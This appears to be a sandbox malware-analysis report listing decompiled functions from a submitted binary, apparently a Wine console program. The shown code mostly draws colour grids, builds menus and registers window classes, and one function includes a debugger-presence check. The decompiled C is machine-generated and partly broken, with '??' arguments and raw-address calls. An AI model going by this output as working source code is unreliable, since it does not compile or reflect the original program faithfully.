0x001b41ab
0x001b41b4
0x00000000
0x00000000
0x001b41b4
0x001b41bd

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
Instruction ID: 80d6959353c36baaaba2738424b149c134c173e6d13ca82b67aff4cc4656fb32
Opcode Fuzzy Hash: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
Instruction Fuzzy Hash: 25E04632911228EBCB15DB8C890498AB2FCEB59B00B11859AF501D3211C370EE40C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 001B009E Relevance: .0, Instructions: 12
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E001B009E(void* __ecx, void* __eflags) {

				if(E001B418D(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x001b00a6
0x001b00bf
0x001b00ba
0x001b00bc
0x001b00bc

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
Instruction ID: 6803abb51c5154ada3ab1557e547850481250d0fc8d5859c7edf707db979c83c
Opcode Fuzzy Hash: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
Instruction Fuzzy Hash: 6CC08C34000F0057CE2AAE1482713E67358A3A5BC2F80048DD4128BB42D71FAC82DA52

Uniqueness

Uniqueness Score: -1.00%

Function 001ABF30 Relevance: 42.3, APIs: 28, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E001ABF30(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				long _v12;
				long _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				signed int _v140;
				void* _v144;
				struct tagRECT _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				signed int* _v188;
				void* _v204;
				RECT* _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v228;
				signed int _v232;
				signed int _v240;
				intOrPtr _v244;
				void* _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v276;
				signed int _v280;
				void* _v292;
				void* _v296;
				int _t176;
				long _t186;
				struct HBRUSH__* _t208;
				long _t214;
				void* _t218;
				intOrPtr _t236;
				void* _t245;
				void* _t326;
				struct HDC__** _t330;
				struct HDC__** _t332;
				struct HDC__** _t336;
				struct HDC__** _t337;
				struct HDC__** _t338;
				struct HDC__** _t341;
				struct HDC__** _t342;
				void* _t343;
				struct HDC__** _t344;

				_t176 = _a8;
				_v160 = _t176;
				if(_t176 == 0xf) {
					BeginPaint(_a4,  &_v80);
					GetClientRect(_a4,  &_v96);
					asm("cdq");
					_v120 = _v96.right / 8;
					_t186 = GetWindowLongW(GetParent(_a4), 8);
					_t330 = _t326 - 0xfffffffffffffff4;
					_v16 = _t186;
					_v116 = 0;
					while(_v116 < 0x10) {
						asm("cdq");
						_v168 = _v116 / 8;
						asm("cdq");
						_v108 = _v168 * _v96.bottom / 2;
						_v164 = _v108;
						asm("cdq");
						_v100 = _v164 + _v96.bottom / 2;
						_v112 = (_v116 & 0x00000007) * _v120;
						_v104 = _v112 + _v120;
						_t208 = CreateSolidBrush( *(_v16 + 4 + _v116 * 4));
						_t332 = _t330 - 4;
						_v124 = _t208;
						 *_t332 = _v80.hdc;
						_v188 =  &_v112;
						_v184 = _v124;
						FillRect(??, ??, ??);
						DeleteObject(_v124);
						_t214 = GetWindowLongW(_a4, 0);
						_t330 = _t332;
						if(_t214 == _v116) {
							_v132 = 2;
							_t218 = SelectObject(_v80.hdc, GetStockObject(6));
							_t336 = _t330 - 0xfffffffffffffffc;
							_v128 = _t218;
							_v104 = _v104 + 0xffffffff;
							_v100 = _v100 + 0xffffffff;
							while(1) {
								 *_t336 = _v80.hdc;
								_v216 = _v112;
								_v212 = _v100;
								_v208 = 0;
								MoveToEx(??, ??, ??, ??);
								_t337 = _t336 - 0x10;
								 *_t337 = _v80.hdc;
								_v232 = _v112;
								_v228 = _v108;
								LineTo(??, ??, ??);
								_t338 = _t337 - 0xc;
								 *_t338 = _v80.hdc;
								_v244 = _v104;
								_v240 = _v108;
								LineTo(??, ??, ??);
								SelectObject(_v80.hdc, GetStockObject(7));
								_t341 = _t338;
								 *_t341 = _v80.hdc;
								_v268 = _v104;
								_v264 = _v100;
								LineTo(??, ??, ??);
								_t342 = _t341 - 0xc;
								 *_t342 = _v80.hdc;
								_v280 = _v112;
								_v276 = _v100;
								LineTo(??, ??, ??);
								_t343 = _t342 - 0xc;
								_t236 = _v132 + 0xffffffff;
								_v132 = _t236;
								if(_t236 == 0) {
									break;
								}
								_v112 = _v112 + 1;
								_v108 = _v108 + 1;
								_v104 = _v104 + 0xffffffff;
								_v100 = _v100 + 0xffffffff;
								_t245 = GetStockObject(6);
								_t344 = _t343 - 4;
								 *_t344 = _v80.hdc;
								_v296 = _t245;
								SelectObject(??, ??);
								_t336 = _t344 - 8;
							}
							SelectObject(_v80, _v128);
							_t330 = _t343 - 8;
						}
						_v116 = _v116 + 1;
					}
					EndPaint(_a4,  &_v80);
					goto L17;
				} else {
					if(_v160 == 0x201) {
						GetClientRect(_a4,  &_v156);
						asm("cdq");
						_v140 = _v156.right / 8;
						_v172 = _a16 >> 0x00000010 & 0xffff;
						asm("cdq");
						_t262 =  >=  ? 8 : 0;
						_v136 =  >=  ? 8 : 0;
						asm("cdq");
						_v136 = (_a16 & 0xffff) / _v140 + _v136;
						SetWindowLongW(_a4, 0, _v136);
						InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
						InvalidateRect(_a4, 0, 0);
						L17:
						_v12 = 0;
					} else {
						_v12 = DefWindowProcW(_a4, _a8, _a12, _a16);
					}
				}
				return _v12;
			}

0x001abf46
0x001abf49
0x001abf52
0x001abf80
0x001abf96
0x001abfa7
0x001abfaa
0x001abfc7
0x001abfcd
0x001abfd0
0x001abfd3
0x001abfda
0x001abfec
0x001abfef
0x001abffd
0x001ac00b
0x001ac011
0x001ac01f
0x001ac02c
0x001ac039
0x001ac042
0x001ac052
0x001ac058
0x001ac05b
0x001ac067
0x001ac06a
0x001ac06e
0x001ac072
0x001ac081
0x001ac09a
0x001ac0a0
0x001ac0a6
0x001ac0ac
0x001ac0cd
0x001ac0d3
0x001ac0d6
0x001ac0df
0x001ac0e8
0x001ac0eb
0x001ac0f6
0x001ac0f9
0x001ac0fd
0x001ac101
0x001ac109
0x001ac10f
0x001ac11b
0x001ac11e
0x001ac122
0x001ac126
0x001ac12c
0x001ac138
0x001ac13b
0x001ac13f
0x001ac143
0x001ac166
0x001ac16c
0x001ac178
0x001ac17b
0x001ac17f
0x001ac183
0x001ac189
0x001ac195
0x001ac198
0x001ac19c
0x001ac1a0
0x001ac1a6
0x001ac1ac
0x001ac1af
0x001ac1b5
0x00000000
0x00000000
0x001ac1c6
0x001ac1cf
0x001ac1d8
0x001ac1e1
0x001ac1eb
0x001ac1f1
0x001ac1f7
0x001ac1fa
0x001ac1fe
0x001ac204
0x001ac204
0x001ac219
0x001ac21f
0x001ac21f
0x001ac22d
0x001ac22d
0x001ac242
0x00000000
0x001abf58
0x001abf68
0x001ac260
0x001ac274
0x001ac277
0x001ac28b
0x001ac29c
0x001ac2b0
0x001ac2b3
0x001ac2c4
0x001ac2d1
0x001ac2f1
0x001ac332
0x001ac353
0x001ac38d
0x001ac38d
0x001abf6e
0x001ac385
0x001ac385
0x001abf68
0x001ac39f

APIs

BeginPaint.USER32 ref: 001ABF80
GetClientRect.USER32 ref: 001ABF96
GetParent.USER32 ref: 001ABFB3
GetWindowLongW.USER32 ref: 001ABFC7
CreateSolidBrush.GDI32 ref: 001AC052
FillRect.USER32 ref: 001AC072
DeleteObject.GDI32 ref: 001AC081
GetWindowLongW.USER32 ref: 001AC09A
GetStockObject.GDI32 ref: 001AC0BA
SelectObject.GDI32 ref: 001AC0CD
GetClientRect.USER32 ref: 001AC260
SetWindowLongW.USER32 ref: 001AC2F1
GetParent.USER32 ref: 001AC300
GetDlgItem.USER32 ref: 001AC314
InvalidateRect.USER32 ref: 001AC332
InvalidateRect.USER32 ref: 001AC353
DefWindowProcW.USER32 ref: 001AC37C

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemPaintProcSelectSolidStock
String ID:
API String ID: 88183673-0
Opcode ID: 648c3c5b20c2e646761c65eaa1ae135d137284993cdc408e60f1d5826e13ec20
Instruction ID: 0035cd84869abd6258fc5dd75dfbd2fea8f2e8e19c63995ed2fc223d21bc5cf9
Opcode Fuzzy Hash: 648c3c5b20c2e646761c65eaa1ae135d137284993cdc408e60f1d5826e13ec20
Instruction Fuzzy Hash: D6D17FB59043089FCB14EFA8D589A9DBBF1BF49300F10892DE899DB351DB349998CF46

Uniqueness

Uniqueness Score: -1.00%

Function 001AAE30 Relevance: 31.7, APIs: 21, Instructions: 226
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E001AAE30(struct HMENU__* _a4, intOrPtr _a8) {
				int _v8;
				struct HINSTANCE__* _v12;
				struct HMENU__* _v16;
				short _v528;
				void* _v536;
				void* _v540;
				void* _v544;
				int _v548;
				int _v552;
				int _v556;
				int _v560;
				int _v564;
				int _v568;
				int _v572;
				WCHAR* _v576;
				int _v580;
				struct HINSTANCE__* _t129;
				int _t131;
				int _t135;
				int _t139;
				int _t143;
				int _t147;
				int _t151;
				int _t155;
				int _t159;
				int _t163;
				void* _t199;
				void* _t200;
				void* _t218;
				struct HINSTANCE__** _t225;
				struct HMENU__** _t226;

				_t129 = GetModuleHandleW(0);
				_t200 = _t199 - 4;
				_v12 = _t129;
				if(_a4 != 0) {
					_v16 = CreateMenu();
					if(_v16 != 0) {
						_t131 =  &_v528;
						_v548 = _t131;
						0xffda0000();
						LoadStringW(_v12, 0x110,  &_v528, _t131);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x110,  &_v528);
						_t135 =  &_v528;
						_v552 = _t135;
						0xffda0000();
						LoadStringW(_v12, 0x111,  &_v528, _t135);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x111,  &_v528);
						_t139 =  &_v528;
						_v556 = _t139;
						0xffda0000();
						LoadStringW(_v12, 0x112,  &_v528, _t139);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x112,  &_v528);
						_t143 =  &_v528;
						_v560 = _t143;
						0xffda0000();
						LoadStringW(_v12, 0x113,  &_v528, _t143);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x113,  &_v528);
						_t147 =  &_v528;
						_v564 = _t147;
						0xffda0000();
						LoadStringW(_v12, 0x114,  &_v528, _t147);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x114,  &_v528);
						_t151 =  &_v528;
						_v568 = _t151;
						0xffda0000();
						LoadStringW(_v12, 0x115,  &_v528, _t151);
						InsertMenuW(_v16, 0xffffffff, 0x400, 0x115,  &_v528);
						_t218 = _t200 - 0xffffffffffffff18;
						if(_a8 != 0) {
							InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
							_t218 = _t218 - 0x14;
						}
						_t155 =  &_v528;
						_v572 = _t155;
						0xffda0000();
						LoadStringW(_v12, 0x100,  &_v528, _t155);
						InsertMenuW(_a4, 0xffffffff, 0x410, _v16,  &_v528);
						_t159 =  &_v528;
						_v576 = _t159;
						0xffda0000();
						LoadStringW(_v12, 0x101,  &_v528, _t159);
						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v528);
						_t163 =  &_v528;
						_v580 = _t163;
						0xffda0000();
						_t225 = _t218 - 0xffffffffffffffb4;
						 *_t225 = _v12;
						_v580 = 0x102;
						_v576 =  &_v528;
						_v572 = _t163;
						LoadStringW(??, ??, ??, ??);
						_t226 = _t225 - 0x10;
						 *_t226 = _a4;
						_v580 = 0xffffffff;
						_v576 = 0x400;
						_v572 = 0x102;
						_v568 =  &_v528;
						InsertMenuW(??, ??, ??, ??, ??);
						_t200 = _t226 - 0x14;
						_v8 = 1;
					} else {
						_v8 = 0;
					}
				} else {
					_v8 = 0;
				}
				return _v8;
			}

0x001aae48
0x001aae4e
0x001aae51
0x001aae58
0x001aae70
0x001aae77
0x001aae89
0x001aae8f
0x001aae92
0x001aaeb6
0x001aaee7
0x001aaef0
0x001aaef6
0x001aaef9
0x001aaf1d
0x001aaf4e
0x001aaf57
0x001aaf5d
0x001aaf60
0x001aaf84
0x001aafb5
0x001aafbe
0x001aafc4
0x001aafc7
0x001aafeb
0x001ab01c
0x001ab025
0x001ab02b
0x001ab02e
0x001ab052
0x001ab083
0x001ab08c
0x001ab092
0x001ab095
0x001ab0b9
0x001ab0ea
0x001ab0f0
0x001ab0f7
0x001ab125
0x001ab12b
0x001ab12b
0x001ab12e
0x001ab134
0x001ab137
0x001ab15b
0x001ab18b
0x001ab194
0x001ab19a
0x001ab19d
0x001ab1c1
0x001ab1f2
0x001ab1fb
0x001ab201
0x001ab204
0x001ab209
0x001ab215
0x001ab218
0x001ab220
0x001ab224
0x001ab228
0x001ab22e
0x001ab23a
0x001ab23d
0x001ab245
0x001ab24d
0x001ab255
0x001ab259
0x001ab25f
0x001ab262
0x001aae7d
0x001aae7d
0x001aae7d
0x001aae5e
0x001aae5e
0x001aae5e
0x001ab273

APIs

GetModuleHandleW.KERNEL32 ref: 001AAE48
CreateMenu.USER32 ref: 001AAE6A

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: CreateHandleMenuModule
String ID:
API String ID: 4123625242-0
Opcode ID: ea3a66fbc2c6f8985ea681114caf609c630cbdb3dd6f19f3c14c1d46ffd311f9
Instruction ID: 72f5fcade86e2581983ccb6c9e03ee0762db79734dc77601f4717d6a4453a3f8
Opcode Fuzzy Hash: ea3a66fbc2c6f8985ea681114caf609c630cbdb3dd6f19f3c14c1d46ffd311f9
Instruction Fuzzy Hash: 57C194B4808304AFD714EF68D54869EBFF0EB44320F10CA6DE8A997395E7749698CF46

Uniqueness

Uniqueness Score: -1.00%

Function 001ABCD2 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 001ABCD8
GetWindowLongW.USER32 ref: 001ABCEC
BeginPaint.USER32 ref: 001ABD05
GetWindowLongW.USER32 ref: 001ABD1E
SelectObject.GDI32 ref: 001ABD41

Part of subcall function 001AC460: GetDlgItem.USER32 ref: 001AC47F
Part of subcall function 001AC460: GetWindowLongW.USER32 ref: 001AC495

CreateSolidBrush.GDI32 ref: 001ABD6C
FillRect.USER32 ref: 001ABD89
SetBkColor.GDI32 ref: 001ABD9F
SetTextColor.GDI32 ref: 001ABDC8
GetModuleHandleW.KERNEL32 ref: 001ABDFD
LoadStringW.USER32 ref: 001ABE27
TextOutW.GDI32 ref: 001ABE6F
TextOutW.GDI32 ref: 001ABEB4
SelectObject.GDI32 ref: 001ABECA
EndPaint.USER32 ref: 001ABEE0

Strings

ASCII: abcXYZ, xrefs: 001ABE78, 001ABE97

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: LongTextWindow$ColorObjectPaintSelect$BeginBrushCreateFillHandleItemLoadModuleParentRectSolidString
String ID: ASCII: abcXYZ
API String ID: 3404974346-732927841
Opcode ID: c5676f3195bfa30042fc217d5b725d89c747b30219d48fe798ad5da0efddfb7f
Instruction ID: 0a6e0a26c72b065ac17d9d9395f337d44082f2c509bb9e0aecdb4a6f46b83751
Opcode Fuzzy Hash: c5676f3195bfa30042fc217d5b725d89c747b30219d48fe798ad5da0efddfb7f
Instruction Fuzzy Hash: 376185B58083099FCB04EFA8D58869EBFF0AF49311F00896DE89997355E7349998CF42

Uniqueness

Uniqueness Score: -1.00%

Function 001AA680 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181
registryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E001AA680(void* __edi, struct HINSTANCE__* _a4, intOrPtr _a8) {
				intOrPtr _v12;
				char _v216;
				char _v428;
				struct _WNDCLASSW _v468;
				char _v980;
				struct HINSTANCE__* _v984;
				char* _v988;
				char* _v992;
				char* _v996;
				intOrPtr _v1000;
				void* _v1008;
				intOrPtr _v1012;
				struct HINSTANCE__* _v1016;
				intOrPtr _v1020;
				char* _v1024;
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t115;
				int _t117;
				intOrPtr* _t118;
				void* _t155;
				void* _t156;
				struct HINSTANCE__** _t165;
				struct HINSTANCE__** _t166;
				intOrPtr* _t167;
				intOrPtr* _t169;

				_t153 = __edi;
				L001BB0CA();
				E001AFC30(__edi,  &_v428, 0, 0xd4);
				_v428 = _a4;
				if(_a8 == 0) {
					_v1016 = 0;
					_v1012 =  &_v428 + 4;
					E001A3370(_t153);
					_t156 = _t155 - 8;
				} else {
					_v1016 = _a4;
					_v1012 =  &_v428 + 4;
					E001AB960();
					_t156 = _t155 - 8;
				}
				E001AF6B0( &_v216,  &_v428 + 4, 0xcc);
				_v468.style = 0;
				_v468.lpfnWndProc = E001ABBB0;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConFontPreview";
				RegisterClassW( &_v468);
				_v468.style = 0;
				_v468.lpfnWndProc = E001ABF30;
				_v468.cbClsExtra = 0;
				_v468.cbWndExtra = 4;
				_v468.hInstance = GetModuleHandleW(0);
				_v468.hIcon = 0;
				_v468.hCursor = LoadCursorW(0, 0x7f00);
				_v468.hbrBackground = GetStockObject(4);
				_v468.lpszMenuName = 0;
				_v468.lpszClassName = L"WineConColorPreview";
				RegisterClassW( &_v468);
				_t110 =  &_v980;
				_v1024 = _t110;
				0xffda0000();
				_t165 = _t156 - 0xffffffffffffffdc;
				_v984 = _t110;
				_v988 =  &_v980;
				_t113 =  !=  ? 0x121 : 0x120;
				_v992 =  !=  ? 0x121 : 0x120;
				 *_t165 = 0;
				_t115 = GetModuleHandleW(??);
				_t166 = _t165 - 4;
				 *_t166 = _t115;
				_v1024 = _v992;
				_v1020 = _v988;
				_v1016 = _v984;
				_t117 = LoadStringW(??, ??, ??, ??);
				_t167 = _t166 - 0x10;
				if(_t117 == 0) {
					 *_t167 =  &_v980;
					_v1024 = L"Setup";
					E001B11F7();
				}
				_t118 = _t167;
				 *((intOrPtr*)(_t118 + 4)) =  &_v428 + 4;
				 *_t118 =  &_v216;
				 *((intOrPtr*)(_t118 + 8)) = 0xcc;
				if(E001AE02E() != 0) {
					if(_a8 != 0) {
						 *_t167 = _a4;
						_v1024 =  &_v428 + 4;
						E001A4AB0();
						_t169 = _t167 - 8;
						 *_t169 = _v428;
						E001A8E70();
						_t167 = _t169 - 4;
					}
					_v996 =  &_v428 + 4;
					if(_a8 == 0) {
						_v1000 = 0;
					} else {
						_v1000 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
					}
					 *_t167 = _v1000;
					_v1024 = _v996;
					E001AC3B0();
					_v12 = 1;
				} else {
					_v12 = 1;
				}
				return _v12;
			}

0x001aa680
0x001aa690
0x001aa6b0
0x001aa6b8
0x001aa6c2
0x001aa6f3
0x001aa6fa
0x001aa6fe
0x001aa703
0x001aa6c8
0x001aa6d4
0x001aa6d7
0x001aa6db
0x001aa6e0
0x001aa6e0
0x001aa724
0x001aa729
0x001aa739
0x001aa73f
0x001aa749
0x001aa765
0x001aa76b
0x001aa790
0x001aa7a6
0x001aa7ac
0x001aa7bc
0x001aa7cb
0x001aa7d4
0x001aa7e4
0x001aa7ea
0x001aa7f4
0x001aa810
0x001aa816
0x001aa83b
0x001aa851
0x001aa857
0x001aa867
0x001aa876
0x001aa87f
0x001aa885
0x001aa888
0x001aa88d
0x001aa890
0x001aa89c
0x001aa8b2
0x001aa8b5
0x001aa8bd
0x001aa8c4
0x001aa8ca
0x001aa8e1
0x001aa8e4
0x001aa8e8
0x001aa8ec
0x001aa8f0
0x001aa8f6
0x001aa8fc
0x001aa90e
0x001aa911
0x001aa915
0x001aa915
0x001aa929
0x001aa92b
0x001aa92e
0x001aa930
0x001aa93f
0x001aa955
0x001aa967
0x001aa96a
0x001aa96e
0x001aa973
0x001aa97c
0x001aa97f
0x001aa984
0x001aa984
0x001aa990
0x001aa99a
0x001aa9b9
0x001aa9a0
0x001aa9ac
0x001aa9ac
0x001aa9d0
0x001aa9d3
0x001aa9d7
0x001aa9df
0x001aa945
0x001aa945
0x001aa945
0x001aa9f1

APIs

#17.COMCTL32 ref: 001AA690
GetModuleHandleW.KERNEL32 ref: 001AA75C
LoadCursorW.USER32 ref: 001AA787
GetStockObject.GDI32 ref: 001AA79D
RegisterClassW.USER32 ref: 001AA7CB
GetModuleHandleW.KERNEL32 ref: 001AA807
LoadCursorW.USER32 ref: 001AA832
GetStockObject.GDI32 ref: 001AA848
RegisterClassW.USER32 ref: 001AA876
GetModuleHandleW.KERNEL32 ref: 001AA8C4
LoadStringW.USER32 ref: 001AA8F0

Part of subcall function 001A8E70: IsWindowVisible.USER32 ref: 001A8EE6
Part of subcall function 001A8E70: GetDC.USER32 ref: 001A8F61

Strings

WineConFontPreview, xrefs: 001AA7B6
WineConColorPreview, xrefs: 001AA861
Setup, xrefs: 001AA908

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow
String ID: Setup$WineConColorPreview$WineConFontPreview
API String ID: 3977189380-2851978119
Opcode ID: be61406b171a175101bd2fb2031fe5d17bd97c0e96294c3d1dd931e158c4870f
Instruction ID: b1ccf8808d7bc5c2d98b3b4e80c37fc9a22d525ee46578e8da04d382df356253
Opcode Fuzzy Hash: be61406b171a175101bd2fb2031fe5d17bd97c0e96294c3d1dd931e158c4870f
Instruction Fuzzy Hash: F291E8B49052189FEB54EF68D94879DBBF4BF05304F0085AEE889E7341E7749A88CF42

Uniqueness

Uniqueness Score: -1.00%

Function 001A7B20 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 281COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32 ref: 001A7BAE
EnterCriticalSection.KERNEL32 ref: 001A7C7A
MultiByteToWideChar.KERNEL32 ref: 001A7D09
LeaveCriticalSection.KERNEL32 ref: 001A7DBD
LeaveCriticalSection.KERNEL32 ref: 001A7F5A
EnterCriticalSection.KERNEL32 ref: 001A7F76
CloseHandle.KERNEL32 ref: 001A800E
LeaveCriticalSection.KERNEL32 ref: 001A802D

Strings

input restore failed: %#lx, xrefs: 001A7FE8
H, xrefs: 001A7E0A
input setup failed: %#lx, xrefs: 001A7B73

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$ByteCharCloseCreateEventHandleMultiWide
String ID: H$input restore failed: %#lx$input setup failed: %#lx
API String ID: 628538822-1542851097
Opcode ID: 632e395688c22a40728f26e9b727e0439433b78c73d13b021a202ab7ed6ef868
Instruction ID: 62f3913f1a588760b0e3dea54aa0e6c6342c68bf68cc6e9b4d2ce8dff01589d9
Opcode Fuzzy Hash: 632e395688c22a40728f26e9b727e0439433b78c73d13b021a202ab7ed6ef868
Instruction Fuzzy Hash: 1FD12AB4809215CFDB15EF68C9587AEBBF4BF49310F0189ADE49997280D7349B88CF52

Uniqueness

Uniqueness Score: -1.00%

Function 001A23E0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 001A23FC
TranslateCharsetInfo.GDI32 ref: 001A2419
GetStartupInfoW.KERNEL32 ref: 001A2452

Strings

WineConsoleClass, xrefs: 001A265E

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: Info$CharsetStartupTranslate
String ID: WineConsoleClass
API String ID: 3822699805-3427835368
Opcode ID: 924e80dceb699dd5b5de3f17383b7ae77f1c0c77f5dc2840dd9e9454cd5e6b18
Instruction ID: 931e9c8942a32d28285cd532294b3c7feebe3f4e9b0180c85d2308d38cdb86c0
Opcode Fuzzy Hash: 924e80dceb699dd5b5de3f17383b7ae77f1c0c77f5dc2840dd9e9454cd5e6b18
Instruction Fuzzy Hash: 1B91D7B49042199FDB14DF68C998BADBBF0FF09304F0185A9E889EB351DB759A84CF41

Uniqueness

Uniqueness Score: -1.00%

